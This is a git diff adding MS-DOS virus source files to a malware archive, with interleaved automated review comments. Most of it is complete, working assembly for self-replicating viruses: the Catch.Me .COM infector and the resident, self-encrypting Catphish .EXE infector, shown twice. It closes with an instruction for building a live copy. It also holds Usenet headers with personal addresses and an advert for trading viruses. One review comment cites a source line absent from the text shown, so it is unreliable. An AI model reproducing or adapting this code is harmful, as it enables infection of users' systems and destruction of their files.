al,[bx+7] ; clear the trap flag + and al,0feh + mov [bx+7],al + pop si + pop ax + pop bx +bugiret: + iret +; +bugon: + pushf + push ds + push ax + mov ax,0 + push ax + pop ds + getloc ax,ptr2 + sub ax,offset(data_begin-doint3) + cli + mov ds:[int3vec],ax + getloc ax,ptr2 + sub ax,offset(data_begin-doint1) + mov ds:[int1vec],ax + push cs + pop ax + mov ds:[int1vec+2],ax + mov ds:[int3vec+2],ax + sti + pop ax + pop ds + popf + ret +; +bugoff: + pushf + push ds + push ax + mov ax,0 + push ax + pop ds + + getloc ax,oldint3 + cli + mov ds:[int3vec],ax + getloc ax,oldint1 + mov ds:[int1vec],ax + getloc ax,oldint1+2 + mov ds:[int1vec+2],ax + getloc ax,oldint3+2 + mov ds:[int3vec+2],ax + sti + + pop ax + pop ds + popf + ret +; +ENDIF +; +; +; the data area +; +data_begin label near +; +T10 LABEL NEAR +T11: MOV DI,0FFFFH +T12: MOV AX,0FFFFH +T13: MOV CX,0FFFFH +T14: CLC +T15: CLD +T16: INC SI +T17: DEC BX +T18: NOP +T19 LABEL NEAR +; +T20 LABEL NEAR +T21: XOR 
[DI],AX +T22: XOR [DI],CX +T23: XOR DX,CX +T24: XOR BX,CX +T25: SUB BX,AX +T26: SUB BX,CX +T27: SUB BX,DX +T28: NOP +T29 LABEL NEAR +; +T30 LABEL NEAR +T31: INC AX +T32: INC DI +T33: INC BX +T34: INC SI +T35: INC DX +T36: CLC +T37: DEC BX +T38: NOP +T39 LABEL NEAR +; +T40: LOOP T20 +T41 LABEL NEAR +; +L11: DB OFFSET (T12-T11),OFFSET (T11-data_begin) +L12: DB OFFSET (T13-T12),OFFSET (T12-data_begin) +L13: DB OFFSET (T14-T13),OFFSET (T13-data_begin) +L14: DB OFFSET (T15-T14),OFFSET (T14-data_begin) +L15: DB OFFSET (T16-T15),OFFSET (T15-data_begin) +L16: DB OFFSET (T17-T16),OFFSET (T16-data_begin) +L17: DB OFFSET (T18-T17),OFFSET (T17-data_begin) +L18: DB OFFSET (T19-T18),OFFSET (T18-data_begin) +; +L21: DB OFFSET (T22-T21),OFFSET (T21-data_begin) +L22: DB OFFSET (T23-T22),OFFSET (T22-data_begin) +L23: DB OFFSET (T24-T23),OFFSET (T23-data_begin) +L24: DB OFFSET (T25-T24),OFFSET (T24-data_begin) +L25: DB OFFSET (T26-T25),OFFSET (T25-data_begin) +L26: DB OFFSET (T27-T26),OFFSET (T26-data_begin) +L27: DB OFFSET (T28-T27),OFFSET (T27-data_begin) +L28: DB OFFSET (T29-T28),OFFSET (T28-data_begin) +; +L31: DB OFFSET (T32-T31),OFFSET (T31-data_begin) +L32: DB OFFSET (T33-T32),OFFSET (T32-data_begin) +L33: DB OFFSET (T34-T33),OFFSET (T33-data_begin) +L34: DB OFFSET (T35-T34),OFFSET (T34-data_begin) +L35: DB OFFSET (T36-T35),OFFSET (T35-data_begin) +L36: DB OFFSET (T37-T36),OFFSET (T36-data_begin) +L37: DB OFFSET (T38-T37),OFFSET (T37-data_begin) +L38: DB OFFSET (T39-T38),OFFSET (T38-data_begin) +; +; +; +; this routine is relocated after the end of data area +; this routine encrypts, writes, and decrypts the virus code +; +begin1: + getloc cx,dat2 ; get off (data_end-entry2) plus max_msk + getloc ax,dat1 ; get decode ket + mov di,si ; and set the begin encrypt address + sub di,offset (data_begin-entry2) + call crypt + mov ah,040h + mov cx,offset data_end-offset entry + mov dx,si + sub dx,offset data_begin-offset entry + doscall + pushf ; save the status of the write + push ax 
+ getloc cx,dat2 ; get off (data_end-entry2) plus max_msk + getloc ax,dat1 + mov di,si + sub di,offset (data_begin-entry2) + call crypt + pop ax ; restore the DOS write's status + popf + ret +; +crypt: + xor [di],ax + xor [di],cx + inc ax + inc di + loop crypt + ret +end1: +; +; global work space and constants +; +old_code: db 090h,090h,090h +jump_code: db 0e9h,0,0 +com_search: db '*.COM',0 +path_chars: db 'PATH=' +file_name: db 40h DUP (0) +my_dta: db 2Bh DUP (0) + db 0,0,0 + +data_end label near +IFDEF stopdebug +; +scan_bytes db 0CCh,090h +; +precrypt: + mov bp,sp ; allocate locals + sub sp,local_stack + doscall 02ch ; seed the random number generator + xor dx,cx + setloc rand_seed,dx + call random + mov di,offset start + push ds + pop es +lp999: + mov cx,08000h + mov si,offset scan_bytes + lodsb + repnz scasb + cmp cx,0 + je done998 + cmp di,offset data_end + jge done998 + lodsb + scasb + jnz lp999 + call random + getloc ax,rand_seed + dec di + mov [di],al + inc di + xor [di],al + inc di ; skip the masked byte + jmp short lp999 +done998: + mov sp,bp + ret +ENDIF + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.catchme.asm b/MSDOS/Virus.MSDOS.Unknown.catchme.asm new file mode 100644 index 00000000..8fee61cc --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.catchme.asm 
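Review bot: `INCLUDE utility.asm <------- Manipulation Task Goes Here!` (the line just before `mov bp,sp` at the top of the hunk) carries free text after the operand that is not a comment, and it names a file that does not appear to be part of this commit, so the sample as archived would not assemble as written and is not a faithful capture of the original source; nothing in the file says so. For readers using this archive for detection work the infection marker is also undocumented: at `cont8` a directory entry whose DOS time seconds field (`and al,01fh` / `cmp al,01fh`) already reads 1Fh is skipped, and `exit4` writes the timestamp back with `and cx,0ffe0h` / `or cx,0001fh` before `mov ax,05701h`, so a seconds field forced to 1Fh is the on-disk artifact to hunt for. A short provenance block at the top of the file would cover both, e.g. `; ARCHIVE NOTE: incomplete - INCLUDE utility.asm is unresolved in this commit` and `; marker: directory timestamp seconds field forced to 1Fh (see cont8 / exit4)`.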
@@ -0,0 +1,138 @@ +;########################################################################### +# +;# Virus Name: Catch.Me # Size: 371 Bytes +# +;# Author: Jerk1N # EMail: jerk1n@trust-me.com +# +;########################################################################### +# +;# Notes +# +;# - Tells the user which files it's infecting! +# +;# - Uses NO anti-virus tricks, encryption etc. +# +;########################################################################### +# + .model tiny + .radix 16 + .code +start: + db 03h,00h,0E9h,00h,00h +gotacod: + call $+3 +getdo: pop di + sub di,offset $-1 + xchg bp,di + jmp om +msg db 'I am the Catch.Me Virus written Jerk1N of +DIFFUSION',0Dh,0Ah + db 'I am infecting files -',0Dh,0Ah,'$' +om: mov ah,1Ah + lea dx,[bp+offset dta] + int 21h + mov ah,09h + lea dx,[bp+offset msg] + int 21h + mov di,100h + lea si,[bp+offset orig] + movsw + movsw + movsb + call findfile + call fndnext +ohcrap: + push 100h + retn +fspec db '*.COM',0 +ID db '[Catch.Me]',0 +creator db '[Jerk1N/DIFFUSION]',0 +orig db 0CDh,20h,00h,00h,00h +new3 db 03h,00h,0E9h,00h,00h +findfile: + call cleara + mov ah,4Eh + mov cx,07h + lea dx,[bp+offset fspec] + int 21h + jc ohcrap + jmp infect +fndnext: + call cleara + mov ah,4Fh + int 21h + jc ohcrap + jmp infect +infect: + mov ax,4301h + mov cx,00h + lea dx,[bp+offset dta+1Eh] + int 21h ;Clear Attributes + call fopen + jc ohcrap + mov ax,4202h + xor cx,cx + xor dx,dx + int 21h + sub ax,05h + mov word ptr [bp+offset new3+3h],ax + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h + mov ah,3Fh + mov cx,5h ;Headr Len + lea dx,[bp+offset orig] + int 21h ;Get orig code! + cmp byte ptr [bp+offset orig],03h + jne goinf + cmp byte ptr [bp+offset orig+2h],0E9h + je fndnext +goinf: + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h + mov ah,40h + mov cx,05h ;Headr Len + lea dx,[bp+offset new3] + int 21h ;Write Header! 
+ mov ax,4202h + xor cx,cx + xor dx,dx + int 21h + mov ah,40h + mov cx,V_len + lea dx,[bp+offset gotacod] + int 21h ;Write Virus + call closef + lea dx,[bp+offset dta+1Eh] + mov ah,09h + int 21h + lea dx,[bp+offset retun] + int 21h + ret +cleara: + mov cx,20h + mov ax,'$$' + lea bx,[bp+offset dta+1Eh] +l: mov [bx],ax + inc bx + inc bx + loop l + ret +fopen: + mov ah,3Dh + mov al,02h + int 21h + xchg bx,ax + ret +closef: + mov ah,3Eh + int 21h + ret +V_len equ offset heap - offset gotacod +retun db 0Dh,0Ah,'$' +heap: ;Destroy all data below this line +dta equ $ + end \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.catphish.asm b/MSDOS/Virus.MSDOS.Unknown.catphish.asm new file mode 100644 index 00000000..a8632e1c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.catphish.asm 
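Review bot: The reinfection test just before `goinf` (`cmp byte ptr [bp+offset orig],03h` and `cmp byte ptr [bp+offset orig+2h],0E9h`, with `new3 db 03h,00h,0E9h,00h,00h` as the written header) is the sample's marker, and nothing in the file records it, which is the detail a reader of this archive needs for detection: a .COM file whose first bytes are `03 00 E9` is what this code treats as already infected. Two further host-side artifacts are visible but undocumented: the `infect` path clears every attribute with `mov ax,4301h` / `mov cx,00h` and never restores them, and the `msg` text 'I am the Catch.Me Virus ...' plus each touched filename (`lea dx,[bp+offset dta+1Eh]` / `mov ah,09h`) are written to the console. A header comment such as `; ARCHIVE NOTE: marker = first bytes 03 00 E9 (see goinf); file attributes cleared and not restored; prints its name and each file it touches to stdout` would make the sample self-describing for analysts.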
@@ -0,0 +1,552 @@ +From smtp Sun Jan 29 16:25 EST 1995 +Received: from ids.net by POBOX.jwu.edu; Sun, 29 Jan 95 16:25 EST +Date: Sun, 29 Jan 1995 16:18:52 -0500 (EST) +From: ids.net!JOSHUAW (JOSHUAW) +To: pobox.jwu.edu!joshuaw +Content-Length: 11874 +Content-Type: text +Message-Id: <950129161852.10074@ids.net> +Status: RO + +To: joshuaw@pobox.jwu.edu +Subject: (fwd) CATPHISH.ASM +Newsgroups: alt.comp.virus + +Path: paperboy.ids.net!uunet!cs.utexas.edu!uwm.edu!msunews!news.mtu.edu!news.mtu.edu!not-for-mail +From: jdmathew@mtu.edu (Icepick) +Newsgroups: alt.comp.virus +Subject: CATPHISH.ASM +Date: 26 Jan 1995 13:06:15 -0500 +Organization: Michigan Technological University +Lines: 486 +Message-ID: <3g8oan$54g@maxwell11.ee> +NNTP-Posting-Host: maxwell11.ee.mtu.edu +X-Newsreader: TIN [version 1.2 PL1] + + + +name VIRUSTEST + title +code segment + assume cs:code, ds:code, es:code + org 100h + +;-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +; The Catphish Virus. +; +; The Catphish virus is a resident .EXE infector. +; Size: 678 bytes (decimal). +; No activation (bomb). +; Saves date and file attributes. +; +; If assembling, check_if_resident jump must be marked over +; with nop after first execution (first execution will hang +; system). +; +; *** Source is made available to learn from, not to +; change author's name and claim credit! *** + +start: + call setup ; Find "delta offset". +setup: + pop bp + sub bp, offset setup-100h + jmp check_if_resident ; See note above about jmp! + +pre_dec_em: + mov bx,offset infect_header-100h + add bx,bp + mov cx,endcrypt-infect_header + +ror_em: + mov dl,byte ptr cs:[bx] + ror dl,1 ; Decrypt virus code + mov byte ptr cs:[bx],dl ; by rotating right. + inc bx + loop ror_em + + jmp check_if_resident + +;--------------------------------- Infect .EXE header ----------------------- +; The .EXE header modifying code below is my reworked version of +; Dark Angel's code found in his Phalcon/Skism virus guides. 
+ + +infect_header: + push bx + push dx + push ax + + + + mov bx, word ptr [buffer+8-100h] ; Header size in paragraphs + ; ^---make sure you don't destroy the file handle + mov cl, 4 ; Multiply by 16. Won't + shl bx, cl ; work with headers > 4096 + ; bytes. Oh well! + sub ax, bx ; Subtract header size from + sbb dx, 0 ; file size + ; Now DX:AX is loaded with file size minus header size + mov cx, 10h ; DX:AX/CX = AX Remainder DX + div cx + + + mov word ptr [buffer+14h-100h], dx ; IP Offset + mov word ptr [buffer+16h-100h], ax ; CS Displacement in module + + + mov word ptr [buffer+0Eh-100h], ax ; Paragraph disp. SS + mov word ptr [buffer+10h-100h], 0A000h ; Starting SP + + pop ax + pop dx + + add ax, endcode-start ; add virus size + cmp ax, endcode-start + jb fix_fault + jmp execont + + +war_cry db 'Cry Havoc, and let slip the Dogs of War!',0 +v_name db '[Catphish]',0 ; Virus name. +v_author db 'FirstStrike',0 ; Me. +v_stuff db 'Kraft!',0 + + +fix_fault: + add dx,1d + +execont: + push ax + mov cl, 9 + shr ax, cl + ror dx, cl + stc + + adc dx, ax + pop ax + and ah, 1 + + + mov word ptr [buffer+4-100h], dx ; Fix-up the file size in + mov word ptr [buffer+2-100h], ax ; the EXE header. + + pop bx + retn ; Leave subroutine + +;---------------------------------------------------------------------------- + + +check_if_resident: + push es + xor ax,ax + mov es,ax + + cmp word ptr es:[63h*4],0040h ; Check to see if virus + jnz grab_da_vectors ; is already resident + jmp exit_normal ; by looking for a 40h + ; signature in the int 63h + ; offset section of + ; interrupt table. + +grab_da_vectors: + + mov ax,3521h ; Store original int 21h + int 21h ; vector pointer. + mov word ptr cs:[bp+dos_vector-100h],bx + mov word ptr cs:[bp+dos_vector+2-100h],es + + + +load_high: + push ds + +find_chain: ; Load high routine that + ; uses the DOS internal + mov ah,52h ; table function to find + int 21h ; start of MCB and then + ; scales up chain to + mov ds,es: word ptr [bx-2] ; find top. 
(The code + assume ds:nothing ; is long, but it is the + ; only code that would + xor si,si ; work when an infected + ; .EXE was to be loaded +Middle_check: ; into memory. + + cmp byte ptr ds:[0],'M' + jne Check4last + +add_one: + mov ax,ds + add ax,ds:[3] + inc ax + + mov ds,ax + jmp Middle_check + +Check4last: + cmp byte ptr ds:[0],'Z' + jne Error + mov byte ptr ds:[0],'M' + sub word ptr ds:[3],(endcode-start+15h)/16h+1 + jmp add_one + +error: + mov byte ptr ds:[0],'Z' + mov word ptr ds:[1],008h + mov word ptr ds:[3],(endcode-start+15h)/16h+1 + + push ds + pop ax + inc ax + push ax + pop es + + + + + +move_virus_loop: + mov bx,offset start-100h ; Move virus into carved + add bx,bp ; out location in memory. + mov cx,endcode-start + push bp + mov bp,0000h + +move_it: + mov dl, byte ptr cs:[bx] + mov byte ptr es:[bp],dl + inc bp + inc bx + loop move_it + pop bp + + + +hook_vectors: + + mov ax,2563h ; Hook the int 21h vector + mov dx,0040h ; which means it will + int 21h ; point to virus code in + ; memory. + mov ax,2521h + mov dx,offset virus_attack-100h + push es + pop ds + int 21h + + + + + pop ds + + + +exit_normal: ; Return control to + pop es ; infected .EXE + mov ax, es ; (Dark Angle code.) + add ax, 10h + add word ptr cs:[bp+OrigCSIP+2-100h], ax + + cli + add ax, word ptr cs:[bp+OrigSSSP+2-100h] + mov ss, ax + mov sp, word ptr cs:[bp+OrigSSSP-100h] + sti + + xor ax,ax + xor bp,bp + +endcrypt label byte + + db 0eah +OrigCSIP dd 0fff00000h +OrigSSSP dd ? + +exe_attrib dw ? +date_stamp dw ? +time_stamp dw ? + + + +dos_vector dd ? + +buffer db 18h dup(?) ; .EXE header buffer. + + + + +;---------------------------------------------------------------------------- + + +virus_attack proc far + assume cs:code,ds:nothing, es:nothing + + + cmp ax,4b00h ; Infect only on file + jz run_kill ; executions. 
+ +leave_virus: + jmp dword ptr cs:[dos_vector-100h] + + + +run_kill: + call infectexe + jmp leave_virus + + + + + +infectexe: ; Same old working horse + push ax ; routine that infects + push bx ; the selected file. + push cx + push es + push dx + push ds + + + + mov cx,64d + mov bx,dx + +findname: + cmp byte ptr ds:[bx],'.' + jz o_k + inc bx + loop findname + +pre_get_out: + jmp get_out + +o_k: + cmp byte ptr ds:[bx+1],'E' ; Searches for victims. + jnz pre_get_out + cmp byte ptr ds:[bx+2],'X' + jnz pre_get_out + cmp byte ptr ds:[bx+3],'E' + jnz pre_get_out + + + + +getexe: + mov ax,4300h + call dosit + + mov word ptr cs:[exe_attrib-100h],cx + + mov ax,4301h + xor cx,cx + call dosit + +exe_kill: + mov ax,3d02h + call dosit + xchg bx,ax + + mov ax,5700h + call dosit + + mov word ptr cs:[time_stamp-100h],cx + mov word ptr cs:[date_stamp-100h],dx + + + + push cs + pop ds + + mov ah,3fh + mov cx,18h + mov dx,offset buffer-100h + call dosit + + cmp word ptr cs:[buffer+12h-100h],1993h ; Looks for virus marker + jnz infectforsure ; of 1993h in .EXE + jmp close_it ; header checksum + ; position. +infectforsure: + call move_f_ptrfar + + push ax + push dx + + + call store_header + + pop dx + pop ax + + call infect_header + + + push bx + push cx + push dx + + + mov bx,offset infect_header-100h + mov cx,(endcrypt)-(infect_header) + +rol_em: ; Encryption via + mov dl,byte ptr cs:[bx] ; rotating left. 
+ rol dl,1 + mov byte ptr cs:[bx],dl + inc bx + loop rol_em + + pop dx + pop cx + pop bx + + mov ah,40h + mov cx,endcode-start + mov dx,offset start-100h + call dosit + + + mov word ptr cs:[buffer+12h-100h],1993h + + + call move_f_ptrclose + + mov ah,40h + mov cx,18h + mov dx,offset buffer-100h + call dosit + + mov ax,5701h + mov cx,word ptr cs:[time_stamp-100h] + mov dx,word ptr cs:[date_stamp-100h] + call dosit + +close_it: + + + mov ah,3eh + call dosit + +get_out: + + + pop ds + pop dx + +set_attrib: + mov ax,4301h + mov cx,word ptr cs:[exe_attrib-100h] + call dosit + + + pop es + pop cx + pop bx + pop ax + + retn + +;---------------------------------- Call to DOS int 21h --------------------- + +dosit: ; DOS function call code. + pushf + call dword ptr cs:[dos_vector-100h] + retn + +;---------------------------------------------------------------------------- + + + + + + + + + + +;-------------------------------- Store Header ----------------------------- + +store_header: + les ax, dword ptr [buffer+14h-100h] ; Save old entry point + mov word ptr [OrigCSIP-100h], ax + mov word ptr [OrigCSIP+2-100h], es + + les ax, dword ptr [buffer+0Eh-100h] ; Save old stack + mov word ptr [OrigSSSP-100h], es + mov word ptr [OrigSSSP+2-100h], ax + + retn + +;--------------------------------------------------------------------------- + + + + + + +;---------------------------------- Set file pointer ------------------------ + +move_f_ptrfar: ; Code to move file pointer. 
+ mov ax,4202h + jmp short move_f + +move_f_ptrclose: + mov ax,4200h + +move_f: + xor dx,dx + xor cx,cx + call dosit + retn + +;---------------------------------------------------------------------------- + + +endcode label byte + +endp + +code ends +end start + +From smtp Fri Jan 27 13:23 EST 1995 +Received: from ids.net by POBOX.jwu.edu; Fri, 27 Jan 95 13:23 EST +Date: Fri, 27 Jan 1995 13:21:38 -0500 (EST) +From: ids.net!JOSHUAW (JOSHUAW) +To: pobox.jwu.edu!joshuaw +Content-Length: 1179 +Content-Type: binary +Message-Id: <950127132138.b52b@ids.net> +Status: RO + +To: joshuaw@pobox.jwu.edu +Subject: (fwd) Private Virii FTP Site +Newsgroups: alt.comp.virus + +Path: paperboy.ids.net!uunet!nntp.crl.com!crl12.crl.com!not-for-mail +From: yojimbo@crl.com (Douglas Mauldin) +Newsgroups: alt.comp.virus +Subject: Private Virii FTP Site +Date: 24 Jan 1995 22:01:53 -0800 +Organization: CRL Dialup Internet Access (415) 705-6060 [Login: guest] +Lines: 14 +Message-ID: <3g4pgh$ka2@crl12.crl.com> +NNTP-Posting-Host: crl12.crl.com +X-Newsreader: TIN [version 1.2 PL2] + +I run THe QUaRaNTiNE, a private FTP site for viral reseachers/coders. I'm +always on the lookout for new viral material. If you'd like access, or +like to trade, email me a list of your collection. + +Serious inquiries only. + + 哪涅 哪-涅哪哪- - 哪哪涅满哪哪-- 哪哪- 哪-涅您 + Yojimbo [碡腈韂 Fast as the Wind + SysOp: The Dojo BBS Quiet as the Forest + 1.7i3.436.1795 Aggressive as Fire + QUaRaNTiNE HomeSite And + THe ULTiMaTE ViRaL InFeCTiON Immovable as a Mountain +  -涅哪哪哪哪涅哪哪 哪 哪哪哪-哪哪哪哪涅哪 + + diff --git a/MSDOS/Virus.MSDOS.Unknown.catphish1.asm b/MSDOS/Virus.MSDOS.Unknown.catphish1.asm new file mode 100644 index 00000000..6c390cf4 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.catphish1.asm 
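Review bot: The committed file is a raw mail/Usenet capture rather than source: it opens with `From smtp ...`, `Received:` and `Message-Id:` headers and, after `end start`, carries a second unrelated forwarded message (an FTP-site advertisement) whose CP437 box-drawing characters have been mis-decoded into CJK mojibake (`哪涅 哪-涅哪哪-`). Neither wrapper will assemble, and the mail headers expose third-party personal addresses that serve no archival purpose. The cleanest fix is to trim the file to the `name VIRUSTEST` … `end start` span and record the posting provenance (group, date, poster handle) in a leading `;` comment block instead. The same listing is added again in this commit as catphish1.asm, so whichever copy is kept should say that it supersedes the other.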
@@ -0,0 +1,675 @@ + +name VIRUSTEST + title +code segment + assume cs:code, ds:code, es:code + org 100h + +;-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +; FirstStrike presents: +; +; The Catphish Virus. +; +; The Catphish virus is a resident .EXE infector. +; Size: 678 bytes (decimal). +; No activation (bomb). +; Saves date and file attributes. +; +; If assembling, check_if_resident jump must be marked over +; with nop after first execution (first execution will hang +; system). +; +; *** Source is made available to learn from, not to +; change author's name and claim credit! *** + +start: + call setup ; Find "delta offset". +setup: + pop bp + sub bp, offset setup-100h + jmp check_if_resident ; See note above about jmp! + +pre_dec_em: + mov bx,offset infect_header-100h + add bx,bp + mov cx,endcrypt-infect_header + +ror_em: + mov dl,byte ptr cs:[bx] + ror dl,1 ; Decrypt virus code + mov byte ptr cs:[bx],dl ; by rotating right. + inc bx + loop ror_em + + jmp check_if_resident + +;--------------------------------- Infect .EXE header ----------------------- +; The .EXE header modifying code below is my reworked version of +; Dark Angel's code found in his Phalcon/Skism virus guides. + + +infect_header: + push bx + push dx + push ax + + + + mov bx, word ptr [buffer+8-100h] ; Header size in paragraphs + ; ^---make sure you don't destroy the file handle + mov cl, 4 ; Multiply by 16. Won't + shl bx, cl ; work with headers > 4096 + ; bytes. Oh well! + sub ax, bx ; Subtract header size from + sbb dx, 0 ; file size + ; Now DX:AX is loaded with file size minus header size + mov cx, 10h ; DX:AX/CX = AX Remainder DX + div cx + + + mov word ptr [buffer+14h-100h], dx ; IP Offset + mov word ptr [buffer+16h-100h], ax ; CS Displacement in module + + + mov word ptr [buffer+0Eh-100h], ax ; Paragraph disp. 
SS + mov word ptr [buffer+10h-100h], 0A000h ; Starting SP + + pop ax + pop dx + + add ax, endcode-start ; add virus size + cmp ax, endcode-start + jb fix_fault + jmp execont + + +war_cry db 'Cry Havoc, and let slip the Dogs of War!',0 +v_name db '[Catphish]',0 ; Virus name. +v_author db 'FirstStrike',0 ; Me. +v_stuff db 'Kraft!',0 + + +fix_fault: + add dx,1d + +execont: + push ax + mov cl, 9 + shr ax, cl + ror dx, cl + stc + + adc dx, ax + pop ax + and ah, 1 + + + mov word ptr [buffer+4-100h], dx ; Fix-up the file size in + mov word ptr [buffer+2-100h], ax ; the EXE header. + + pop bx + retn ; Leave subroutine + +;---------------------------------------------------------------------------- + + +check_if_resident: + push es + xor ax,ax + mov es,ax + + cmp word ptr es:[63h*4],0040h ; Check to see if virus + jnz grab_da_vectors ; is already resident + jmp exit_normal ; by looking for a 40h + ; signature in the int 63h + ; offset section of + ; interrupt table. + +grab_da_vectors: + + mov ax,3521h ; Store original int 21h + int 21h ; vector pointer. + mov word ptr cs:[bp+dos_vector-100h],bx + mov word ptr cs:[bp+dos_vector+2-100h],es + + + +load_high: + push ds + +find_chain: ; Load high routine that + ; uses the DOS internal + mov ah,52h ; table function to find + int 21h ; start of MCB and then + ; scales up chain to + mov ds,es: word ptr [bx-2] ; find top. (The code + assume ds:nothing ; is long, but it is the + ; only code that would + xor si,si ; work when an infected + ; .EXE was to be loaded +Middle_check: ; into memory. 
+ + cmp byte ptr ds:[0],'M' + jne Check4last + +add_one: + mov ax,ds + add ax,ds:[3] + inc ax + + mov ds,ax + jmp Middle_check + +Check4last: + cmp byte ptr ds:[0],'Z' + jne Error + mov byte ptr ds:[0],'M' + sub word ptr ds:[3],(endcode-start+15h)/16h+1 + jmp add_one + +error: + mov byte ptr ds:[0],'Z' + mov word ptr ds:[1],008h + mov word ptr ds:[3],(endcode-start+15h)/16h+1 + + push ds + pop ax + inc ax + push ax + pop es + + + + + +move_virus_loop: + mov bx,offset start-100h ; Move virus into carved + add bx,bp ; out location in memory. + mov cx,endcode-start + push bp + mov bp,0000h + +move_it: + mov dl, byte ptr cs:[bx] + mov byte ptr es:[bp],dl + inc bp + inc bx + loop move_it + pop bp + + + +hook_vectors: + + mov ax,2563h ; Hook the int 21h vector + mov dx,0040h ; which means it will + int 21h ; point to virus code in + ; memory. + mov ax,2521h + mov dx,offset virus_attack-100h + push es + pop ds + int 21h + + + + + pop ds + + + +exit_normal: ; Return control to + pop es ; infected .EXE + mov ax, es ; (Dark Angle code.) + add ax, 10h + add word ptr cs:[bp+OrigCSIP+2-100h], ax + + cli + add ax, word ptr cs:[bp+OrigSSSP+2-100h] + mov ss, ax + mov sp, word ptr cs:[bp+OrigSSSP-100h] + sti + + xor ax,ax + xor bp,bp + +endcrypt label byte + + db 0eah +OrigCSIP dd 0fff00000h +OrigSSSP dd ? + +exe_attrib dw ? +date_stamp dw ? +time_stamp dw ? + + + +dos_vector dd ? + +buffer db 18h dup(?) ; .EXE header buffer. + + + + +;---------------------------------------------------------------------------- + + +virus_attack proc far + assume cs:code,ds:nothing, es:nothing + + + cmp ax,4b00h ; Infect only on file + jz run_kill ; executions. + +leave_virus: + jmp dword ptr cs:[dos_vector-100h] + + + +run_kill: + call infectexe + jmp leave_virus + + + + + +infectexe: ; Same old working horse + push ax ; routine that infects + push bx ; the selected file. + push cx + push es + push dx + push ds + + + + mov cx,64d + mov bx,dx + +findname: + cmp byte ptr ds:[bx],'.' 
+ jz o_k + inc bx + loop findname + +pre_get_out: + jmp get_out + +o_k: + cmp byte ptr ds:[bx+1],'E' ; Searches for victims. + jnz pre_get_out + cmp byte ptr ds:[bx+2],'X' + jnz pre_get_out + cmp byte ptr ds:[bx+3],'E' + jnz pre_get_out + + + + +getexe: + mov ax,4300h + call dosit + + mov word ptr cs:[exe_attrib-100h],cx + + mov ax,4301h + xor cx,cx + call dosit + +exe_kill: + mov ax,3d02h + call dosit + xchg bx,ax + + mov ax,5700h + call dosit + + mov word ptr cs:[time_stamp-100h],cx + mov word ptr cs:[date_stamp-100h],dx + + + + push cs + pop ds + + mov ah,3fh + mov cx,18h + mov dx,offset buffer-100h + call dosit + + cmp word ptr cs:[buffer+12h-100h],1993h ; Looks for virus marker + jnz infectforsure ; of 1993h in .EXE + jmp close_it ; header checksum + ; position. +infectforsure: + call move_f_ptrfar + + push ax + push dx + + + call store_header + + pop dx + pop ax + + call infect_header + + + push bx + push cx + push dx + + + mov bx,offset infect_header-100h + mov cx,(endcrypt)-(infect_header) + +rol_em: ; Encryption via + mov dl,byte ptr cs:[bx] ; rotating left. + rol dl,1 + mov byte ptr cs:[bx],dl + inc bx + loop rol_em + + pop dx + pop cx + pop bx + + mov ah,40h + mov cx,endcode-start + mov dx,offset start-100h + call dosit + + + mov word ptr cs:[buffer+12h-100h],1993h + + + call move_f_ptrclose + + mov ah,40h + mov cx,18h + mov dx,offset buffer-100h + call dosit + + mov ax,5701h + mov cx,word ptr cs:[time_stamp-100h] + mov dx,word ptr cs:[date_stamp-100h] + call dosit + +close_it: + + + mov ah,3eh + call dosit + +get_out: + + + pop ds + pop dx + +set_attrib: + mov ax,4301h + mov cx,word ptr cs:[exe_attrib-100h] + call dosit + + + pop es + pop cx + pop bx + pop ax + + retn + +;---------------------------------- Call to DOS int 21h --------------------- + +dosit: ; DOS function call code. 
+ pushf + call dword ptr cs:[dos_vector-100h] + retn + +;---------------------------------------------------------------------------- + + + + + + + + + + +;-------------------------------- Store Header ----------------------------- + +store_header: + les ax, dword ptr [buffer+14h-100h] ; Save old entry point + mov word ptr [OrigCSIP-100h], ax + mov word ptr [OrigCSIP+2-100h], es + + les ax, dword ptr [buffer+0Eh-100h] ; Save old stack + mov word ptr [OrigSSSP-100h], es + mov word ptr [OrigSSSP+2-100h], ax + + retn + +;--------------------------------------------------------------------------- + + + + + + +;---------------------------------- Set file pointer ------------------------ + +move_f_ptrfar: ; Code to move file pointer. + mov ax,4202h + jmp short move_f + +move_f_ptrclose: + mov ax,4200h + +move_f: + xor dx,dx + xor cx,cx + call dosit + retn + +;---------------------------------------------------------------------------- + + +endcode label byte + +endp + +code ends +end start + + +>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< + + Below is a sample file that is already infected. + Just cut out code and run through debug. Next rename + DUMMY.FIL to DUMMY.EXE and you have a working copy of + your very own Catphish virus. 
